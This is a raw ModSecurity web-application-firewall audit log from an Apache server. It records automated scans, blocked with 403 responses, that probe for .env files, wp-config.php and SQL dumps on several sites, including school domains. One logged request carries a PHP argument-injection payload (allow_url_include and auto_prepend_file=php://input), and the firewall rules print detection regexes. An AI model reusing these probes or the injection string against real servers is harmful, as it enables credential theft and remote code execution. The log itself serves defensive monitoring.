User-Agent: Go-http-client/1.1
--00eb3d51-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--00eb3d51-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744628744833849 885 (- - -)
Stopwatch2: 1744628744833849 885; combined=327, p1=291, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--00eb3d51-Z--
--6f753d54-A--
[14/Apr/2025:18:06:00 +0700] Z_zsGNPxEtam20ggC7hEIQAAAIw 103.236.140.4 34980 103.236.140.4 8181
--6f753d54-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 128.199.182.55
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 128.199.182.55
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--6f753d54-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6f753d54-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744628760452923 914 (- - -)
Stopwatch2: 1744628760452923 914; combined=442, p1=404, p2=0, p3=0, p4=0, p5=37, sr=169, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6f753d54-Z--
--caa2db6a-A--
[14/Apr/2025:18:18:40 +0700] Z_zvENPxEtam20ggC7hEMQAAAJI 103.236.140.4 35050 103.236.140.4 8181
--caa2db6a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 170.64.214.197
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 170.64.214.197
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--caa2db6a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--caa2db6a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744629520643866 826 (- - -)
Stopwatch2: 1744629520643866 826; combined=334, p1=298, p2=0, p3=0, p4=0, p5=36, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--caa2db6a-Z--
--64222a5d-A--
[14/Apr/2025:18:28:24 +0700] Z_zxWNPxEtam20ggC7hFEwAAAJU 103.236.140.4 36212 103.236.140.4 8181
--64222a5d-B--
GET /wp-config.php HTTP/1.1
Referer: www.google.com
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.233.57
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie:
X-Forwarded-For: 188.166.233.57
Accept-Encoding: gzip
X-Varnish: 126481787
--64222a5d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--64222a5d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630104116315 693 (- - -)
Stopwatch2: 1744630104116315 693; combined=248, p1=221, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--64222a5d-Z--
--5562a71d-A--
[14/Apr/2025:18:28:24 +0700] Z_zxWNga3eJwvi_gLpI9WAAAAFM 103.236.140.4 36216 103.236.140.4 8181
--5562a71d-B--
GET /wp-config.php HTTP/1.1
Referer: www.google.com
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.233.57
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
Cookie:
X-Forwarded-For: 188.166.233.57
Accept-Encoding: gzip
X-Varnish: 126694405
--5562a71d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--5562a71d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630104167486 824 (- - -)
Stopwatch2: 1744630104167486 824; combined=340, p1=309, p2=0, p3=0, p4=0, p5=31, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5562a71d-Z--
--120f3464-A--
[14/Apr/2025:18:32:23 +0700] Z_zyR4gxSXM4jtK9zHGL3gAAAMk 103.236.140.4 37888 103.236.140.4 8181
--120f3464-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.142.182.44
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.142.182.44
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--120f3464-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--120f3464-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630343680505 699 (- - -)
Stopwatch2: 1744630343680505 699; combined=295, p1=258, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--120f3464-Z--
--36090c6e-A--
[14/Apr/2025:18:32:24 +0700] Z_zySFpzfFgMsbYwm2Kf1wAAABE 103.236.140.4 37898 103.236.140.4 8181
--36090c6e-B--
GET /core/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.142.182.44
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.142.182.44
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--36090c6e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--36090c6e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630344367803 744 (- - -)
Stopwatch2: 1744630344367803 744; combined=314, p1=257, p2=0, p3=0, p4=0, p5=57, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--36090c6e-Z--
--b74c8c65-A--
[14/Apr/2025:18:32:24 +0700] Z_zySIgxSXM4jtK9zHGL4QAAAM8 103.236.140.4 37900 103.236.140.4 8181
--b74c8c65-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.142.182.44
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.142.182.44
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--b74c8c65-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b74c8c65-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630344411841 736 (- - -)
Stopwatch2: 1744630344411841 736; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=142, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b74c8c65-Z--
--db71b261-A--
[14/Apr/2025:18:32:25 +0700] Z_zySVpzfFgMsbYwm2Kf2AAAABI 103.236.140.4 37906 103.236.140.4 8181
--db71b261-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.142.182.44
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.142.182.44
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--db71b261-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--db71b261-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630345063465 631 (- - -)
Stopwatch2: 1744630345063465 631; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db71b261-Z--
--260cb90f-A--
[14/Apr/2025:18:32:25 +0700] Z_zySVpzfFgMsbYwm2Kf2QAAABU 103.236.140.4 37908 103.236.140.4 8181
--260cb90f-B--
GET /core/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.142.182.44
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.142.182.44
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--260cb90f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--260cb90f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630345112028 634 (- - -)
Stopwatch2: 1744630345112028 634; combined=264, p1=236, p2=0, p3=0, p4=0, p5=27, sr=67, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--260cb90f-Z--
--baadc319-A--
[14/Apr/2025:18:43:10 +0700] Z_z0ztga3eJwvi_gLpI-rgAAAEc 103.236.140.4 40472 103.236.140.4 8181
--baadc319-B--
GET /wp-config.php HTTP/1.0
Referer: www.google.com
Host: up.smkn22jakarta.sch.id
X-Real-IP: 188.166.233.57
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 188.166.233.57
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--baadc319-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--baadc319-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630990201756 760 (- - -)
Stopwatch2: 1744630990201756 760; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--baadc319-Z--
--c2850d6c-A--
[14/Apr/2025:18:43:10 +0700] Z_z0ztga3eJwvi_gLpI-rwAAAEU 103.236.140.4 40474 103.236.140.4 8181
--c2850d6c-B--
GET /wp-config.php HTTP/1.0
Referer: www.google.com
Host: up.smkn22jakarta.sch.id
X-Real-IP: 188.166.233.57
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 188.166.233.57
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--c2850d6c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c2850d6c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744630990222587 760 (- - -)
Stopwatch2: 1744630990222587 760; combined=347, p1=313, p2=0, p3=0, p4=0, p5=34, sr=155, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c2850d6c-Z--
--c056e134-A--
[14/Apr/2025:20:35:10 +0700] Z_0PDlpzfFgMsbYwm2KgrgAAAA0 103.236.140.4 43342 103.236.140.4 8181
--c056e134-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 167.172.232.142
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 167.172.232.142
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--c056e134-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c056e134-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744637710376740 668 (- - -)
Stopwatch2: 1744637710376740 668; combined=256, p1=220, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c056e134-Z--
--56a28560-A--
[14/Apr/2025:22:15:12 +0700] Z_0mgNPxEtam20ggC7hGfwAAAIE 103.236.140.4 44126 103.236.140.4 8181
--56a28560-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.135.193.65
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.135.193.65
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.126 Mobile Safari/537.36
Accept-Charset: utf-8
--56a28560-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--56a28560-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744643712142497 818 (- - -)
Stopwatch2: 1744643712142497 818; combined=340, p1=304, p2=0, p3=0, p4=0, p5=36, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--56a28560-Z--
--228d2c48-A--
[14/Apr/2025:22:18:44 +0700] Z_0nVIgxSXM4jtK9zHGOYQAAANE 103.236.140.4 44168 103.236.140.4 8181
--228d2c48-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.154.143.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.154.143.162
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--228d2c48-C--
--228d2c48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--228d2c48-E--
--228d2c48-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744643924381445 5265 (- - -)
Stopwatch2: 1744643924381445 5265; combined=3192, p1=512, p2=2638, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--228d2c48-Z--
--18b3af0d-A--
[14/Apr/2025:22:48:50 +0700] Z_0uYlpzfFgMsbYwm2KhMAAAABU 103.236.140.4 44476 103.236.140.4 8181
--18b3af0d-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 143.110.213.72
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 143.110.213.72
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--18b3af0d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--18b3af0d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744645730897197 847 (- - -)
Stopwatch2: 1744645730897197 847; combined=317, p1=288, p2=0, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--18b3af0d-Z--
--85e43a7e-A--
[14/Apr/2025:22:59:56 +0700] Z_0w_NPxEtam20ggC7hGkQAAAIs 103.236.140.4 44548 103.236.140.4 8181
--85e43a7e-B--
GET /bd.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 2.58.56.43
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 2.58.56.43
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--85e43a7e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--85e43a7e-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646396617198 2686 (- - -)
Stopwatch2: 1744646396617198 2686; combined=952, p1=423, p2=499, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--85e43a7e-Z--
--10b28f2c-A--
[14/Apr/2025:22:59:58 +0700] Z_0w_tPxEtam20ggC7hGkgAAAI4 103.236.140.4 44550 103.236.140.4 8181
--10b28f2c-B--
GET /newbase.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.141.215.21
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.141.215.21
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--10b28f2c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--10b28f2c-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744646398281940 3071 (- - -)
Stopwatch2: 1744646398281940 3071; combined=1118, p1=586, p2=501, p3=0, p4=0, p5=31, sr=183, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--10b28f2c-Z--
--eb737304-A--
[14/Apr/2025:22:59:59 +0700] Z_0w_9PxEtam20ggC7hGkwAAAIo 103.236.140.4 44552 103.236.140.4 8181
--eb737304-B--
GET /installer.sql HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.66.35.20
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.66.35.20
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/329.0.660098639 Mobile/15E148 Safari/604.1
Accept: */*
--eb737304-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eb737304-H--
